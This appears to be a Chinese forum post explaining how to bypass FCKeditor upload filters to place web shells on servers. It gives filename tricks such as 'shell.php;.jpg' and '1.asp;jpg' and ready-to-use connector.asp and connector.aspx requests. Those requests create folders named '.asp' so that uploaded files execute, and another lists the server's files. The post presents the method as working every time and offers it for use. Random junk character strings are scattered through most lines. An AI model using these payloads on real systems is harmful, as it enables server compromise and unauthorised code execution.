很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
: N9 B: d# z7 X3 O1 B) f( h# }* k4 K, Z" k
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。) I: Y% g( _6 c1 b1 ?1 p* h B! p) m
+ h4 W. \+ t4 P, D1 F7 c2 r继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
+ m s) q+ j3 P( t3 [" |
5 l4 F9 O% T5 J& i突破建立文件夹:
; r9 K7 l8 G& B' x! |0 x; ^) }2 Y- B) ~/ r ^3 M% _6 V5 d( {' S% f
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp$ z% D0 `5 @$ @8 b* f: F! L6 W
& d& V$ J0 D* I
参数:1 d% n; i' n) \, v
0 q( g2 H0 C+ N
当前目录名:CurrentFolder=/qing.asp4 F/ X( \0 u. r/ ^1 l
7 r# ~ a0 c; [; y% j
新的目录名:NewFolderName=x.asp( j* M) U* e& t0 l W3 g3 }, G
2 d' G @$ c( q) B4 B& ~
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……" d& }( ?. W4 Q2 V
/ K0 b1 p& K b8 |+ Z9 v. d那么 x.asp 就已经建立生成了,此方法百试百灵!
$ Q3 V5 l0 D& H/ [$ g" T4 Y8 u$ ?5 B, B6 q
新建文件夹参数 x.asp,基本都能搞定。
# C. x; E/ V5 z2 @
: H+ F& x) A: z6 m下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
4 Z) _9 F' U6 S8 O2 l9 f ]' j: S. s3 E) D+ o4 f
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
- p2 S$ J' p* N/ T; n! s6 S! l8 `
, V* E- N6 A0 n- h3 x% D/ Z7 ^ S获取文件列表
6 p- s, Q4 S" P! L7 o aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
) B! J5 i9 c$ v' a
2 [- b: P9 |. G T, d) p# C |